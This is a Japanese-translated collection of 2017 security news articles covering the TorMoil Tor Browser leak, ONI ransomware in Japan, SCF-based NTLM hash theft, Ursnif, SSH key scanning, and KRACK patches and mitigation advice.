     「影響を受ける[Torブラウザ]ユーザが、特別に細工されたWebページに移動すると、そのオペレーティングシステムは、Torブラウザをバイパスして直接リモートホストに接続する」と、Cavallarinは発言している。
     そのページに直接接続することによって、Torブラウザは、Torが中継するネットワークを通過しないので、ユーザの現実世界のIPアドレスを晒すことになる。

    TorMoilはオンラインで未だに悪用されていない

     「我々は、この脆弱性がオンラインで悪用されていることを認識していない」と、Tor Projectは本日の声明中で発言している。それであるにも拘わらず、攻撃者はTorブラウザのバイナリをリバースエンジニアリングし、パッチされたコードを検出することができる。精通したプログラマは、大変簡単に、そのバグが発生する方法を理解し、そのバグを悪用するためのプログラムを作成することができる。
     大部分のLinuxユーザが影響を受けるが、Tor Projectチームは、Tails OSディストリビューション上でTorブラウザを実行しているLinuxユーザ、並びに、TorブラウザのSandbox化されたバージョン(未だアルファ ステージ)を活用しているユーザは、影響を受けないと発言している。
     開発者はまた、彼らがIPリークを修正するために配布したパッチが、唯一の解決策であると付け加えている(可能な限り早急にリークを停止するために急いで適用しなさい)。これで、file:// URL 機能は、Torブラウザのユーザに関して幾つかのシチュエーションでは破壊される可能性がある。Torブラウザの開発者によると、ユーザは、そのリンクを、新しいタブにドラッグ・ドロップすることで file:// URL を開くことが可能である。


    ChromeのImage Downloaderアドウェア拡張に注意せよ
    BleepingComputer : News>Security (2017/11/01)
     これは、Chrome Webストアから拡張をインストールする時に、誰もが注意すべき公共サービス情報である。殆どの拡張は、全く無害であるが、ストアにアップデートされ、長期間削除されない、不快で悪意ある拡張が益々一般的になり始めている。
     例えば、今日、私は、我々のマルウェア削除ヘルパーの一つであるAuraが、疑わしいと見做しているImage Downloader(これへのリンクは直ぐに排除された)と呼ばれる新しいChrome拡張について告げる。詳しい検証で、この拡張は、あなたが訪問しているWebサイトに広告を挿入し、あなたがそのサイトと相互作用すると、新しいタブで不快なサイトを開き、そして、検索エンジンの結果ページの先頭に広告を挿入するアドウェアである。
     あなたは、この拡張がどのように動作するかを説明するビデオを見ることができる。
     ブラウザが起動すると、この拡張は、適切に動作するために必要な設定情報をダウンロードするために二つのサイトに接続する。この情報は、次に、以下に示す広告を挿入するための拡張によって使用される。


    挿入された広告

     助言として、あなたが本当に必要な拡張だけをダウンロードし、それをインストールする前に、その拡張のパーミッションを常にチェックするようにしなさい。悪意ある拡張は、一般的に、あらゆるWebトラフィックを改竄するために全パーミッションを取得しようとする。これは大部分の拡張には必要のないものである。必ずセキュリティプログラムのアップデートをインストールしなさい。
     拡張を調べたい人々に関しては、HybridAnalysisVirusTotalに、拡張をアップロードしなさい。


    Bootkit身代金要求型マルウェアの悪漢共は、日本のBadRabbitセキュリティホールに飛び込んでいる
    The Register : Security (2017/10/31)
     身代金要求型マルウェアの新種は、明らかに日本で標的型攻撃のために使用されている。
     MBR-ONI(新しいBootkit身代金要求型マルウェア)は、その暗号化ルーチン用にDiskCryptorと呼ばれる合法でオープンソースのディスク暗号化ユーティリティの改竄されたバージョンに依存している。これは、先週Bad Rabbit身代金要求型マルウェアによって悪用されたものと同じツールである。
     ONIと新しく発見されたMBR-ONIは、身代金要求型マルウェアの全ての特徴を表に出しているが、このマルウェアが日本企業に対する標的型攻撃の証拠を隠すことを意味する有害なワイパーとして使用されていると、警備情報企業Cybereasonは認識している。

     我々は、ONI身代金要求型マルウェアが、精巧なハッキング操作を隠蔽するワイパーとして使用された可能性を疑っている。これらの標的型攻撃は、3から9ヶ月にわたって継続し、全ては、一度に数百のマシンを暗号化しようとする試みで終了した。
     セキュリティ侵害されたマシンで発見された法医学的遺物は、攻撃者が彼らの操作を隠蔽するための重大な試みを行ったことを示している。

     Cybereasonによると、MBR-ONIは、同じ一連の攻撃において、ONI(身代金要求型マルウェアの早期の株)と関連して使用されている。一緒に配備することはもちろん、不快な二つの株が「同じeMailアドレス」を共有することであると、研究者達は主張している。一方のマルウェアが、同じ目的を達成した時、同一の攻撃で身代金要求型マルウェアの二つの株を使用することは、Cybereasonと他の興味を持つオブザーバ達の双方にとって謎のままである。
     最新の攻撃は日本に特定されているが、身代金要求型マルウェアとワイパーに関連する標的型攻撃は、ここ数年、世界中で増加している。目立とうとする例としては、Saudi Aramco(【訳注】 サウジアラビア王国の国営石油会社), RasGas(【訳注】 カタールのドーハに本社を置くカタールガスに次いで世界で2番目の規模を持つ液化天然ガス供給会社)や他の標的にされた組織に対するShamoon攻撃が含まれる。
     最新の日本におけるこのマルウェアの攻撃は、兵器化されたOfficeドキュメント(最終的にAmmyy Admin RATを投下するように設計されている)を運ぶために、スピア型フィッシングeMail(【訳注】 全く同じ内容のメールを大量に不特定多数のアドレスに送り付けるのではなく、攻撃相手のことをよく研究し、ごく自然に感じられる件名や本文、添付ファイル名などが付される(ESETマルウェア情報局より))を装っているようである。マルウェアのペイロードは、eMail中のパスワードで保護された汚れたZIPファイルによって運ばれる。誰かがZIPファイルを開いた時に予期される特徴は、RATをダウンロードし実行するためのVBScriptを可能にするために、マクロを有効にするように誘導してくることである。
     Ammyy Adminと他のハッキングツールを使用することは、攻撃者が内部ネットワークを精密にマップし、認証を収穫し、横断的に移動し、最終的に重要な資源(標的のネットワークの完全制御を取得する前にドメインコントローラ(DC)を含む)をセキュリティ侵害する。Ammyy Adminは、しばしば悪意あるハッカーによって悪用されるものであるが、合法的なリモート管理ツールである。


    日本での身代金要求型マルウェア攻撃の段階

     Cybereasonは、ハッカー共がネットワークを介して拡散するために、他のツールとNSA(米国国家安全保障局)から流出したEternalBlue脆弱性悪用プログラムとを結合して使用していると発言している。データ損壊と攻撃の成功に伴うログの削除は、上述のことを証明するものではないが、Cybereasonは、MS17-010アップデート(2017年3月にリリースされた)が、セキュリティ侵害されたマシンにはインストールされていないことを発見している。更に、SMBv1は、セキュリティ侵害された環境にわたって有効にされたままであった。
     この攻撃の背後にいるハッカー共は、焦土作戦を実行中である。この身代金要求型マルウェアに加え、攻撃者共は、Windowsのイベントログを完全に消去する目的のバッチファイルを使用している。この行為は、インチキのグループポリシーによって攻撃の後の段階で適用される。更に、ONIバイナリファイルも、大規模なファイルの配列を暗号化するために、そのDomain Controllerからコピーされ実行される。
     Cybereasonによると、ONIはターゲットにしたネットワーク上の大部分のコンピュータに対して使用されるが、MBR-ONIは、一握りのエンドポイントに対してのみ使用されている。これらのエンドポイントは、重要な資源(アクティブ・ディレクトリ・サーバ、ファイル・サーバ等)である。
     日本攻撃は、2016年12月(それ以前の可能性も)以来2017年9月まで、少くとも9ヶ月間継続している。
     Cybereasonによると、ONIは、GlobeImposter身代金要求型マルウェアの変種とコードを共有しているようであり、幾つかのルーチンは同一である。MBR−ONIは、DiskCryptorからそのコードの大部分を借りている。コードの一部の改竄で、この攻撃は、合法のディスク暗号化ユーティリティを身代金要求型マルウェアや、有害なワイパーにさえ変換できることを示している。
     「ONIとMBR-ONIは、データの破壊によって進行中のハッキング操作を隠蔽するので、身代金要求型マルウェアよりワイパーにより近い目的を提供している」と、Cybereasonは結論している。

    Botnote

    ONIは、暗号化したファイルに追加するファイル拡張子に基づいてその名前を与えられた。名前のONIは、日本では“devil”(鬼)を意味する、そして、これは、脅迫文中に見出されるeMailアドレスに表示されてもいる。“Oninoy0ru”は、“Night of the Devil”(鬼の夜)と翻訳される。Cybereasonは、他のeMailアドレス(ユーザ名に文字列“ONI”が存在する)を含むONIの脅迫文の別のバージョンを監視している。


    ハッカーはユーザと対話することなく、Windowsログイン認証を盗むことができる
    BleepingComputer : News>Security (2017/10/27)
     Microsoftは、攻撃者がユーザと何ら対話することなく、Windows NTLMパスワードハッシュ(【訳注】 NTLMは、Windows NT 4.0以前のWindows NTシリーズのOSで標準的に使われていたネットワークログオンのためのユーザ認証方式。Windows2000からはデフォルトの認証方式にKerberos認証が採用されているが、Microsoftは、運用性向上のためにNTLMハッシュをケルベロス認証の実装に追加している。研究者によると、このような設計により、NTLMハッシュが既知の場合に攻撃者がドメインコントローラにケルベロス認証のチケットを発行させることが可能(e-Words、Wikipediaより))を盗むことを可能にする危険なハッキングに対して、最新バージョンのWindowsだけにパッチをあてた。
     このハックは簡単に実行でき、成功するために高度な技術的なスキルを必要としない。攻撃者が実行するために必要な唯一のことは、公開されているWindowsフォルダの内部に悪意あるSCFファイルを配置することである。
     このファイルが、そのフォルダ内部に配置されると、このファイルは不可解なバグのせいで実行され、そのターゲットのNTLMパスワードハッシュを収集し、攻撃者の設定サーバにそれを送信する。公共で利用できるソフトウェアを使用することは、攻撃者が、NTLMパスワードをクラックし、その後、そのユーザのコンピュータへのアクセスを取得することを可能にする。
     このようなハッキングは、犠牲者のネットワークへの直接接続を持つ攻撃者が、近くのシステムにアクセスを拡大することを可能にする。

    共有フォルダを持つ全てのコンピュータに脆弱性があるわけではない

     パスワードで保護されている共有フォルダ付きのコンピュータは安全である。これは、WindowsのDefaultのオプションなので、殆どのユーザは、この攻撃に対して脆弱ではない。
     それにも拘わらず、企業環境、学校、他の公共のネットワーク中のユーザは、しばしば便利だということだけでパスワード無しでフォルダを共有しているので、多くのシステムは攻撃に対して開かれている。


    共有オプション

    Windows 10とServer 2016だけパッチが利用可能である

     このハッキングは、アメリカ人のセキュリティ研究者Juan Diego(4月にこの問題をMicrosoftに通知した)によって発見された。
     Microsoftは、今月のMicrosoftの月例アップデート(パッチの火曜日)のADV170014セキュリティ・アドバイザリで、この攻撃ベクトルをパッチした。このパッチは、Windows 10とWindows Server 2016ユーザ用だけである。
     今迄のWindowsバージョンは、このレジストリの修正が、Windows Firewallの以前のバージョンと互換しないために、この攻撃に対して脆弱である。

    脆弱性への攻撃ルートは解明されていない

     Bleeping Computerとの会話で、ADV170014は、彼が発見したこのハッキングをブロックするが、そもそも、このハックが可能である理由を、Diegoは説明できなかった。
     この攻撃は、悪意あるSCFファイルを介して動作する。SCFは、Shell Command Fileの頭文字であり、大変限定されたWindows Explorerコマンド(Windows Explorerを開いたり、デスクトップを表示したりするような)の設定をサポートするファイルフォーマットである。我々全てが日常的に使用している"Show Desktop"ショートカットは、SCFファイルである。
     「この攻撃は、SCFファイルを脆弱性のあるフォルダにアップロードする必要があるだけである」と、DiegoはeMailで、ユーザとの対話を必要としないということを強調して、Bleeping Computerに告げた。
     SCFファイルに関連した今までの攻撃は、犠牲者がそのフォルダにアクセスした時だけに実行された。Diegoによって発見された今回は、SCFファイル内部に含まれる悪意あるコマンドは、SCFファイルが共有フォルダ内部にアップロードされると直ぐに実行される(ユーザが、そのファイルの内容の調査を待つ必要なしに)。
     これが発生した理由は、Diegoには不可解である。「この攻撃は自動化されている。これを引き起こす根本的な問題は、私には分からないままである」と、「これに関してMicrosoftは、大変隠したがっている」と、Diegoは発言している。

    Microsoftのパッチは、pass-the-hash攻撃を解決しようとしている

     Microsoftが配布したパッチは、実際には、Diegoが説明不可能とするSCF自動実行を修正するものではないが、pass-the-hash(ユーザのネットワークの外部にあるサーバとNTLMハッシュの自動共有。Diegoも、このハックで採用したテクニック)として知られる20年前の攻撃をパッチしようとしている。
    この問題は古い問題であり、しばしば、多くの種類のWindowsハックで使用されている。まさに今春、pass-the-hash攻撃は、ユーザ認証を盗むためにChromeとSCFファイルを結合させている。他の最近のpass-the-hash攻撃に関しては、2016年2015年で公開されている。
     Microsoftが配布したパッチは、攻撃者が、ローカルネットワークの外部に据え付けられているサーバーの承認を得るためにローカルユーザを欺くことを妨げる。
     Diegoが、彼の発見した攻撃をMicrosoftに通知したが、この修正された問題に関してMicrosoftから認められたのはドイツ人研究者Stefan Kanthak(彼もまた2017年3月に類似のバグを通知している)であった。
     pass-the-hash攻撃を悪用する多くの方法が存在することを仄めかしながら、「Microsoftは(しょっちゅう)下手糞な仕事を行う、今月公開されたアップデートは、私が通知した6つの異なる弱点のうちの二つしか閉じていない」と、Kanthakは、eMailでBleeping Computerに告げている。
     この長く続いているセキュリティホールを、現在Microsoftが閉じたというKanthakの判断に賛意を表しつつ、「私は、この脆弱性を悪用する別法を作業中である」と、Diegoも発言している。
     ADV170014は、オプショナルのパッチとして存在している。特にDiegoの危険なハックと、十中八九他のpass-the-hash攻撃もブロックすることが確認されているので、このアップデートをインストールすることは強く推奨される。Diegoのpass-the-hash変形攻撃を実地検証することは、彼のブログで可能である。


    URSNIFバンキング・トロイが日本で拡散している
    Kaspersky : ThreatPost (2017/10/26)
     バンキング・トロイUrsnifを蔓延させている背後の攻撃者達は、日本を、先月開始したスパムキャンペーンを介してマルウェアを配布するためのトップ・ターゲットの一つにしていた。
     数年間、Ursnif(もしくは、Gozi)は、北アメリカ、ヨーロッパ、オーストラリアと共に日本をターゲットにしてきた。しかし、最近のIBM X-Forceによるこのマルウェアの解析によると、ハッカー共は、日本で新しいターゲットと回避テクニックを含むUrsnifキャンペーンを増大させている。
     「Ursnifバンキング・トロイは、2016年の金融部門に於いて最も活動的なマルウェア・コードであった。そして、2017年も今迄、その優位性を維持している」と、「しかし、2017年に於いて最も人気のあるターゲットの一つは日本の銀行であり、これは、9月に始まった最新の2017年度第三四半期において、Ursnifのオペレータが最も活動的な場所である」と、木曜日にリリースされたS-Forceのレポートは述べている。
     最近のサンプルは、犯罪者グループが、もはや銀行や銀行認証情報だけをターゲットにしているわけではないことを示している。「銀行に加えて、日本でアクティブなUrsnifの変種は、ローカルWebメール、クラウド・ストレージ、仮想通貨交換所、eコマースサイトのユーザ認証情報もターゲットにしている」と、Limor Kessem(IBMのセキュリティ相談役であり、このレポートの著者)は記述している。
     Ursnifは2017年に発見された広範囲にわたる脅威である。当初ののターゲットは、英語圏の国々におけるオンライン・バンキング有線システムであった。これは、このトロイのコードが偶然漏洩した2010年に変更された。これは、Webインジェクション・テクニック機能を配備し、隠蔽された仮想ネットワーク・コンピューティング(Hvnc)を活用したUrsnif v2の開発を導いた。


    2017年における攻撃ボリュームあたりの拡散しているバンキング・トロイ ファミリー

     2010年の末にかけて、オリジナルのUrsnifは、ヨーロッパ、イギリス、アメリカの主要銀行をターゲットにしていた。2017年まで早送りすると、Ursnifは現在、北アメリカ、オーストラリア、日本のターゲットに追加して、ブルガリア、ポーランド、スペイン、チェコ共和国の銀行をターゲットにしている。
     Ursnifの最新のバージョンは、幾つかの悪意ある活動の能力(スクリプトベースのブラウザ操作、Webインジェクション、マン・イン・ザ・ブラウザ機能(【訳注】 プロキシ型トロイの木馬というマルウェアによってWebブラウザの通信を盗聴、改竄を行う攻撃(Weblioより))、フォームグラビング(【訳注】 様々なブラウザ中のWeb形式のデータを捕獲する方法(Weblioより))、スクリーンキャプチャ、吹き替え版ビデオ・グラビング、隠蔽されたVNCとSOCKSプロキシ(【訳注】 セキュリティを高めるために、イントラネットからインターネットへの外向き接続の際に プロキシサーバを仲介するネットワーク構成(富士通のサイトより))攻撃)がある。
     配布方法の観点から、Ursnifは、有害なスパム(malspam)と脆弱性悪用キットを使用してきた。
     日本での最近のキャンペーンでは、Ursnifはマルスパムを使用している。これは、日本に於いて提供されている金融サービスやペイメント・カードからであることを装うインチキの添付ファイル付きのeMailを含んでいる。別のマルスパムの変種は、JavaScriptを含む .zip ファイルのダウンロードを引き金とするHTMLリンクを配布している。このスクリプトは、Ursnifのペイロードを取ってくるPowerShellスクリプトを起動する。
     アンチ検出メカニズムと歩調を合わせて、X-Forceによって検証された殆どの最近の変種は、「ユーザが、悪意あるファイルを閉じた後にだけPowerShellを起動するマクロ回避テクニック」を使用していると、Kessemは説明し、「この方法は、このマルウェアがSandbox検出を回避することを支援する」と、彼女は発言している。
     Ursnifによって使用されてきた他の回避テクニックは、コマンド&コントロール コミュニケーションを隠蔽するためのTorネットワークを含んでいる。7月、Forcepointは、Ursnifによって使用されていた別のアンチSandboxテクニック(研究環境を示す赤い旗を振るマウスの動き)を検出した。Sandbox環境が検出されると、ブービートラップされた添付ファイルは、彼らのペイロードを配布しないだろう。
     何故、日本がターゲットなのか? 「日本において組織化されたサイバー犯罪の歴史は、ついこの前である」と、 「マルウェア移住の殆どの場合、十分な資金を持つサイバー犯罪者グループは、より簡単に稼げるお金、セキュリティが強固でない、および、バンキング・セッションの間に、彼らのスパム策略およびソーシャルエンジニアリングに、あまり慣れていないユーザにとっての意外性を捜している」と、Kessemは説明している。


    攻撃者は、SSHセキュリティ・コントロールの欠乏に関するレポートの後、SSH鍵のスキャンを開始
    BleepingComputer : News>Security (2017/10/19)
     犯罪者は、偶然に漏洩された証明書でWebサイトに侵入するために、オンラインサイトのSSH秘密鍵を含んでいるディレクトリを巨大スキャンニング中である。
     SSH認証は、従来のユーザ名-パスワード モデルや、鍵をベースとした認証を介して動作する。この文字列は、管理者が、RSA暗号化鍵のペア(公開鍵と秘密鍵)を生成することで動作する。
     秘密鍵は、オーナーが認証したいサーバー上に配置されるが、ユーザは、ローカルなSSH設定ファイルに秘密鍵を保存する。

    秘密鍵のスキャンは突然始まった

     Wordfence(米国に本拠を置くWordPressセキュリティ企業)は、昨晩、攻撃者達が、SSH秘密鍵を探している可能性を暗示するフォルダ名で、巨大なスキャンを行っていることに気がついた。
     攻撃者達は、"root," "ssh," "id_rsa"のような、用語もしくは、用語の組み合わせを含むWebディレクトリを探していた。今週以前にこの種のスキャンに関する活動は殆ど無かったので、このスキャンは突然発生したことになる。
     「ここ24時間、我々は、新たな攻撃者がSSH秘密鍵に関してWebサイトを巨大スキャンしていることを確認した」と、昨晩レポートを公開したWordfenceのCEO Mark Maunderは、発言している。
     「このグラフは、ここ48時間でのスキャン活動の巨大な上昇を示している」と、続けて「我々は、この活動の増加は、攻撃者が、秘密鍵に関して多少のスキャンニングの成果を上げたので、彼らが更に努力することを決めたと考えている。これは、一般的なバグ、もしくは、WordPressサイトのオーナーによって実行された操作ミスを示しているのかもしれない(秘密鍵は、それによって偶然公開される)。」と、Maunderは発言している。


    SSH秘密鍵のスキャン

    危険なSSH設定は、このスキャンの引き金になったとするレポート

     この突然の上昇は、Venafi(IDentity Protectionサービスのプロバイダ)によって、今週初めに公開されたレポートによっても説明される。
     この会社は、410 ITセキュリティ専門家の間での研究を実施し、「SSHセキュリティ・コントロールの欠乏が蔓延している」ことを発見した。

    鍵の研究は、以下を発見した:

    ✈ 応答者の61%が、SSHを管理する管理者の数を制限も監視もしていない。35%だけが、悪意に満ちたインサイダーの誤用が、組織を盲目にしたままにするので、SSHユーザに、彼らに認証されているキーの設定を禁止する方針を実行している。
    ✈ 応答者の90%は、SSH鍵全ての完全で正確な目録を持っていないので、鍵が盗まれたか否か、誤用されたか否か、あるいは、信用すべきではないのかを、判断する方法を持っていないと発言している。
    ✈ 応答者の丁度23%は、四半期もしくは、もっと頻繁に鍵を使いまわしている。40%は、全く鍵を使いまわしていないか、使い回しは偶にしかしないと発言してる。SSH鍵へのアクセスを取得した攻撃者達は、鍵が使い回されるまで、特権的アクセスを持続する。
    ✈ 応答者の51%は、彼らがSSH用の「ポートフォワーディングをしない」を実行していないと発言している。ポートフォワーディングは、システム間のファイアーウォールを効果的にバイパスすることをユーザに可能にするので、SSHにアクセスできるサイバー犯罪者は、ネットワークセグメントを越えて素早く回することができる。
    ✈ 応答者の54%は、SSH鍵が使用されるロケーションを制限していない。移動しないアプリケーションに関しては、特定のIPアドレスにSSHの使用を制限することで、サイバー犯罪者による、リモートからのセキュリティ侵害されたSSH鍵の使用を制限することができる。このようなバグを公に公開したり、レポートしたりすることは、しばしば、地下サイバー犯罪者(そして、彼らはセキュリティ専門家同等の情報セキュリティをテーマにしたサイトの熱心な読者である)の反応の引き金となる。

     Webサイトのオーナーは、彼らが公開サーバにSSH秘密鍵を偶然アップロードしているか否か、あるいは、SSH秘密鍵をGitやSVNレポジトリに収容したか否かチェックすることがアドバイスされている。SSH秘密鍵にアクセスするパスフレーズを設定することもまた、攻撃者が、この鍵を使用することを妨げる(たとえ、攻撃者が、どうにかしてそれを手に入れたとしても)。


    KRACK(Key Reinstallation Attack) WiFi攻撃から自分自身を守る方法
    Bitdefender : Hot For Security (2017/10/19)
     今週早く、ルーヴェン・カトリック大学(ベルギー)の研究者が、WPA2ワイアレス・コミュニケーション規格中に緊急のフローを発見した。これは、全てのWiFi接続デバイスに、攻撃に対する脆弱性が残ったままになっていたということである。そこで、我々は、Wi-Fi Alliance(【訳注】 無線LAN製品の普及促進を図ることを目的とした業界団体(Wikipediaより))が修正を用意するまで、ユーザが、リスクを軽減するために採用できる簡単なステップを提示する。
     我々が昨日書いたように、研究者Mathy Vanhoefは、「犠牲者の範疇にいる攻撃者は、KRACKを使用して、これらの弱点を悪用することができる」ことを確認している。
     攻撃は、platform-agnostic(プラットフォームにとらわれないことを意味している)であり、理論的には、最新の保護をされた全てのWiFiネットワークに対して動作するだろう。このフローを悪用する攻撃が未だ、記録されていないことは注目に値するが、後悔より安全であるほうが良い。
     Wi-Fi Allianceは、状況を改善するための計画を立案しているが、この脆弱性は、WPA2が完全にパッチされるまでの暫くの間、継続している。
     この部分に関して、United States Computer Emergency Readiness Team(CERT、米国コンピュータ緊急事態対策チーム)は、このニュースに対応するアドバイザリを公開し、影響を受ける既知の全てのハードウェアとソフトウェアのリストさえ公開した。Wi-Fi allianceと製品ベンダは、急いでパッチを用意しているので、あなたが実行できることを以下に掲げる。

    既に利用できる、あらゆるアップデートとパッチをインストールする

     あなたのベンダが、パッチを既に利用できるようにしているのであれば、それを入手しなさい。パッチの取得とインストールは簡単ではないかもしれないが、あなたのデータとプライバシーを大切に思うのであれば、パッチするための努力をしなければならない。一般的に、ルータは、ベンダのWebサイトを訪問し、パッチをダウンロードし、Webツールを介してルータにパッチを入力することで、手動でパッチする必要がある。

    AES暗号化を使用する

     AESとTKIP共にKRACK対して脆弱性がある。しかしながら、AESは、パケットの挿入に対する脆弱性がないので、それがAES(TKIPではない)で暗号化されている限り、ある程度の心の平安と共にWPA2を使用し続けることができる。

    HTTPSで安全にされ、且つ / もしくは VPNを使用しているWebサイトだけを訪問しなさい

     HTTPSは、その独自のセキュリティ・レイヤーを取り決めているので、HTTPS(TLS)で安全にされた全てのWebサイトは、理論的には訪問しても安全である。より大きな心の平安のためには、入出力の伝達の暗号化に信頼あるVPNサービスを使用しなさい。HTTPサイトは、KRACKだけでなく、一般的に安全ではない。

    可能なら、よりリスクの低いデバイスを使用する

     KRACKが明るみに出ると直ぐに、実際にWiFiを介して送受信する全てのデバイスに脆弱性が確認された。しかしながら、Vanhoefは、OSのバージョン6.0以降で稼働しているAndroidデバイスは、欠陥のあるWPA2を実装しているために、最も脆弱性があると発言している。この件が解決されるまでは、非Androidデバイスを使用したほうが良いだろう。もちろん、これは解決策ではないが、異なるOSを搭載している複数の電話とタブレットを二刀流で使用している人々に関しては、単純に「より安全」なオプションである。
     デスクトップに関しては、研究者たちは、Linuxが最も脆弱なオペレーティングシステムであることを発見したので、可能なら、取り敢えずもう一度、Windows PCかMacの使用を検討するように促している。

    公共のWiFiを回避し、家庭や仕事ではEthernetを使用する

     公共のWiFiホットスポットは、この時点で最も脆弱なので、できる限りそれらを回避しなさい。家庭と仕事場では、あなたのコンピュータが可能であるのなら、有線ネットワークを使用しなさい。これは、WiFiを介してWebに接続する代わりに、あなたのコンピュータにEthernetケーブルを接続することを意味している。

    Windowsをアップデートする

     あなたが、Windows PCのユーザであるのなら(我々の読者の殆どがそうだろうが)、Microsoftの10月のアップデートが、KRACKに対してWindows 10を保護している。Microsoftに準拠しているソフトウェアメーカーは、これをWindows Centralへのステートメントで確認している。

     「Microsoftは、10月10日にセキュリティアップデートをリリースした。Windows Updateを有効にし、セキュリティ アップデートを適用した顧客は、自動的に保護される。我々は、可能になると直ぐに顧客を保護するためにアップデートしたが、責任ある産業パートナーとして、我々は、他のベンダがアップデートを開発しリリースできるようになるまで、公開を差し控えた」と、Microsoftは発言している。

     あなたのPCが自動アップデートを有効にしているなら問題ないが、そうでないのであれば、Windows Updateを介してパッチを手動で入手する必要がある。我々は、あなたが、直ぐにこれを実行するよう提案する。
     (Windowsをアップデートすることは、可能性のある攻撃からWindowsデバイスだけを保護するのだということを思い出しなさい。あなたの他のデバイスは、依然として、パッチもしくは、上に列挙したステップを介して安全にする必要がある)

    Apple並びに他のOSのユーザに関して

     Appleは、報道機関に対して、KRACK用のパッチを含むiOS, macOS, watchOS, tvOSの新しいバージョンをベータテスト中であることを認めている。けれども、最終バージョンがリリースされる時期に関しては、何も発言されていない。一般的に、Appleは、そのプラットフォーム用のベータOSのテストに、少くとも2ヶ月をかけている。
     この部分に関して、Googleも、問題を認識し、直ぐにパッチを公開するだろうことを認めている。Linux供給元もまた、対応にあたっている(パッチは既に展開されていると発言している)。
     まさに、全ての人々が、彼らのベンダがアップデートを配備するまで、上述の一般的なヒントを押し付けられることになっている。
     いつもどおり、あなたの防御を更に強化するために信頼あるアンチウィルス ソリューションを稼働しなさい。ハッカーが成功裡にKRACK攻撃を配備し、攻撃者が、あなたを悪意ある、あるいは、不正なWebサイトにリダイレクトしようとした場合でも、あるいは、あなたのシステムに悪意あるファイルを投下しようとした場合でも、あなたは未だ、あなたの側にアンチマルウェア ソリューションを持っている。
     これで終わり。諸君、安全に!


    KRACK(Key Reinstallation Attack) WPA2脆弱性に関するファームウェアとドライバ・アップデートのリスト
    BleepingComputer : News>Security (2017/10/16)

    【訳者より】 このリストは、米国東部時間 2017年10月16日 17:25(日本時間、2017年10月17日 07:25)現在のものです。最新情報は、コチラを参照してください。

     多くの人が読んでいる、あるいは、直ぐに読むだろうが、WPA2ワイアレス・プロトコルにKrackと呼ばれる脆弱性が存在している。この脆弱性は、ワイアレス接続を盗聴し、マルウェアをインストールしたり、Webページをセキュリティ侵害するためにワイアレス ストリーム中にデータを挿入することを攻撃者に可能にするものである。
     あなた自身を保護するために、多くのWiFi製品ベンダは、彼らの製品のファームウェアやドライバのアップデートをリリースするだろう。ユーザは、自分自身を保護するためにアップデートが利用できるようになったら直ちに、ハードウェアをアップデートすることが強く提案されている。これは、ルータ・ファームウェアとワイアレス・ネットワークカード・ドライバを含む。
     この問題の手助けとなるように、私は、様々なWiFiベンダと、新しいドライバが利用できるか否かについて、現段階で分かっている情報のリストを作成した。この脆弱性は大変新しく、利用可能な情報が殆ど無いので、今後数日間、新しい情報があるか否か確認するために、このページをチェックするよう、あなたにアドバイスする。このページは、ベンダに接触して得た情報、CERT情報ページ、他のソースからの情報を含んでいる。

    情報が利用可能な企業

    Arch Linux
    Archは、wpa_supplicantとhostapd用のアップデートをリリースしている。パッチは、コチラコチラで発見できる。

    Amazon
    Amazon広報担当は、我々の質問に対して、「我々のどのデバイスがこの脆弱性を含んでいるのか検証作業中であり、必要なものにはパッチを発行するだろう」と、応答した。

    Apple
     AppleInsiderの記事によると

    会社を代表して話すことを認められていないApple内部の情報筋は、ハードウェア感受性を削除するためのパッチは、OSの現在の範囲の「直前の」ベータに含まれていた(月曜のバッチの前のリリースを意味する)とAppleInsiderに告げている。しかしながら、我々の情報源は、AirPortハードウェア(Time Machine, AirPort Extremeベース ステーション,AirPort Expressを含む)、は利用できるパッチを持っていないと、そして、それが進行中であるか否かも定かでないと指摘している。

    Aruba Networks
     パッチ情報は、コチラコチラで発見できる。FAQも同様にポストされている。

    Belkin, Linksys, Wemo
     BleepingComputerは、Belkinの対応に関する声明を受け取った。

     「Belkin, Linksys, Wemo(【訳注】 ベルキンが展開している三種類のブランド)は、WPA脆弱性を認識している。我々のセキュリティ チームは、詳細に検証している、そして、適切に勧告するだろう。我々は顧客ファーストであることを約束し、求めに応じられるよう、どのようにして顧客が製品をアップデートできるのかに関して、我々のセキュリティ・アドバイザリのページに指示を投稿することを計画していることを理解されたい。」

    Cisco
     Ciscoは、彼らの製品に関連する脆弱性を考察するアドバイザリと、脆弱性のある製品のリストをリリースした。Ciscoは、IOSとドライバ アップデートは開発中であり、リリースされるだろうと述べている。Cisco製品のユーザは、この先アップデートされる可能性があるので、頻繁にアドバイザリをチェックするようにアドバイスされている。

    DD-WRT
    KRACK用のパッチは、DD-WRT SVNに存在している。けれどもパッチされたファームウェアがダウンロード可能か否か、現在分かっていない。

    Debian
     Debianは、Krack脆弱性を解決するアップデートに関する情報付きのアドバイザリをDebian Security Announceメーリングリストに投稿している。

    Dell
    Dell広報担当は、彼らが積極的にこの脆弱性を調査しており、ここ数日中にアドバイザリをアップするだろうとBleepingComputerに告げている。

    Espressif
     Espressifは、ESP-IDF, ESP8266 RTOS SDK, ESP8266 NONOS SDK用のアップデートを彼らのGithubのページにリリースしている。

    Fedora
    Fedoraは、テストに利用できるFedora 25アップデートを持っている。Fedora 26Fedora 27アップデートは、安定版リリースへの追加待ちである。

    FreeBSD
     CERTによると、FreeBSDは、この脆弱性を認識しており、ユーザは、彼らのFreeBSD-Announceメーリングリストに参加するか、Security Informationページを監視するかの、どちらかをしなければならない。

    Fortinet
     このドキュメントによると、FortiAP 5.6.1が、KRACK脆弱性を修正したリリースである。

    Google
     Android 6.0以降は、現在この攻撃に対して脆弱性がある。BleepingComputerがGoogleに接触した時、彼らのステートメントは、「我々は問題を認識している、そして、我々は、来週影響を受ける全てのデバイスにパッチするだろう」というものであった。今のところ、Google WiFiに関連した利用可能な情報はない。

    Intel
    Intelは、アドバイザリをリリースした。これには、アップデートされたドライバへのリンクが含まれている。

    Lede
     Ledeは、「テストが完了すると直ちにLEDE 17.1.4としてリリースされるだろう」と述べている。OpenWRTに関しては何も発言していない。

    LineageOS
     LineageOSは、Krack脆弱性を防御するために統合されたパッチを持っている。

    Linux
     脆弱性リリースによると、「我々の取り組みは、Linuxで一般的に使用されているWi-Fiクライアントwpa_supplicanのバージョン2.4以降に対して特に壊滅的である。」 パッチはコチラで発見できる。

    Meraki
     アップデートは、KRACK脆弱性を解決するCisco Meraki用にリリースされた。多くの情報は、このアドバイザリ(802.11r Vulnerability (CVE: 2017-13082) FAQ)に発見される。

    Microchip Technology
     Microchipは、利用可能なアップデート付きのアドバイザリを投稿した。

